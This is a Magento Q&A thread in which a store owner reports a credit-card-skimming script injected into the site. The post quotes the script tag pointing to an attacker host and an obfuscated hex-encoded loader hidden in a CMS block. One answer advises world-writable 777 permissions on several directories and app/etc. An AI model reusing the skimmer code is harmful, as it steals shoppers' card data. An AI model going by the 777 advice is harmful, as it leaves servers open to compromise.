Magento Asked by Casey on October 25, 2020
I can’t seem to locate how this script is getting into the head section of my site but it’s stealing credit cards. I’ve grepped the entire codebase and searched the entire database for “seooptimization” and found nothing so it must be added via createElement somewhere? What’s interesting is it’s added in the middle of all my theme js files. Can anyone help me track this down and figure out how to avoid it getting into the head of my site because I’ve chased it around for months now. I’ve removed it from the cms_block in the database, from miscellaneous scripts in the admin and they just keep finding new ways to put it on the site, now I can’t even track it down to get it off. Here’s what it looks like.
<script src="https://mage-seooptimization.com/events" id="magento-init"></script>
EDIT: So I finally was able to remove this. I found it in the database in one of my footer blocks in the cms_block table. It was disguised as follows:
<script>var meta_tags = ["0604104A124B2257060A0F021D1605114537","4B030D1849001802451A57514D014C164C0604181E040D59124A5D50", "19034A475057444D120B0405190E5E090D090002101F0B4C1A", "11110A04001B1C5E0C0C0E040E36164D1131192B50591E140B", "0245065705191A05080704154D0F1117420B5C12571317070B15", "15200E0F0C1317044D4519020410001145435A1757030016", "3111161808140C04004A4D12041A5749", "570D161E1105435F4A0F0B06135403000D051102101D0C180B151F161E4B01050C591C06000C1E1251504B", "114B110F15370D04170B0814021C58420B0E465A5E1D04050F0F0216", "5D0C0C031551504B014C0204171D5E04121A04181D33", "180C0E0E4917504B07100F001D044B"];</script>
Maybe someone can comment on how that could possibly end up being a script in the head section of the site?
Also, this doesn’t solve how it got there in the first place. Are there any known methods to inject code into the database for Magento 2.2.6 that may need patched? As far as I know I have all available patches applied.
List of enabled modules:
Aitoc_DimensionalShipping | EkoUK_ImageCleaner | Experius_WysiwygDownloads | FishPig_WordPress | FishPig_WordPress_RelatedProducts | MagePal_GuestToCustomer | MagePsycho_Customshipping | Amasty_Base | Amazon_Core | Amazon_Login | Amazon_Payment | FME_Faqs | Bold_OrderComment | Klarna_Core | Klarna_Ordermanagement | Magefan_LoginAsCustomer | Amasty_CronScheduleList | FME_Prodfaqs | Amasty_GiftCard | Klarna_Kp | Ebizmarts_MailChimp | Dotdigitalgroup_Email | Mageplaza_Core | Mageplaza_Smtp | Magiccart_Alothemes | Magiccart_Magicmenu | Magiccart_Magicproduct | Magiccart_Magicslider | Magiccart_Shopbrand | Magiccart_Testimonial | Mirasvit_Core | Mirasvit_Misspell | Mirasvit_Report | Mirasvit_Search | Mirasvit_SearchAutocomplete | Mirasvit_SearchLanding | Mirasvit_SearchMysql | Mirasvit_SearchReport | Mirasvit_SearchSphinx | Mirasvit_SearchUltimate | ShipWorks_Module | Temando_Shipping | VNS_Custom | Vertex_Tax | WeltPixel_Backend | WeltPixel_Maxmind |
I have encountered a same issue. It was injecting a fake payment section in the checkout page. This time the link was different though. I was able to remove the code using the header block editor in the admin. But I'm kind of sure, it will happen again. Anyways going to update the whole thing. And put a paid firewall service. If anybody finds a solution to this, it'd be very helpful. Thanks.
Answered by Mathew on October 25, 2020
facing the same thing and I have about 70% of the same modules as you!!! Did you ever find out which module led to the vulnerability?
Answered by Jojo on October 25, 2020
php bin/magento module:status | grep -v Magento | grep -v List | grep -v None | grep -v -e '^$'| xargs php bin/magento module:disable
Answered by Denys Belevtsov on October 25, 2020
First of all scan your website with the available tools like
then you will get some idea on malware and security issues for your website.
Please ask your hosting provider for a detail report on Website security.
You can check Magneto file and folder permission as well from your end and male it proper by running the following commands:
find . -type f -exec chmod 644 {} ; // 644 permission for files
find . -type d -exec chmod 755 {} ; // 755 permission for directory
find ./var -type d -exec chmod 777 {} ; // 777 permission for var folder
find ./pub/media -type d -exec chmod 777 {} ;
find ./pub/static -type d -exec chmod 777 {} ;
chmod 777 ./app/etc
chmod 644 ./app/etc/*.xml
Hope this will help you and please share an update after this activity so I can guide you next step.
Answered by Jack on October 25, 2020
Get help from others!
Recent Questions
Recent Answers
© 2024 TransWikia.com. All rights reserved. Sites we Love: PCI Database, UKBizDB, Menu Kuliner, Sharing RPP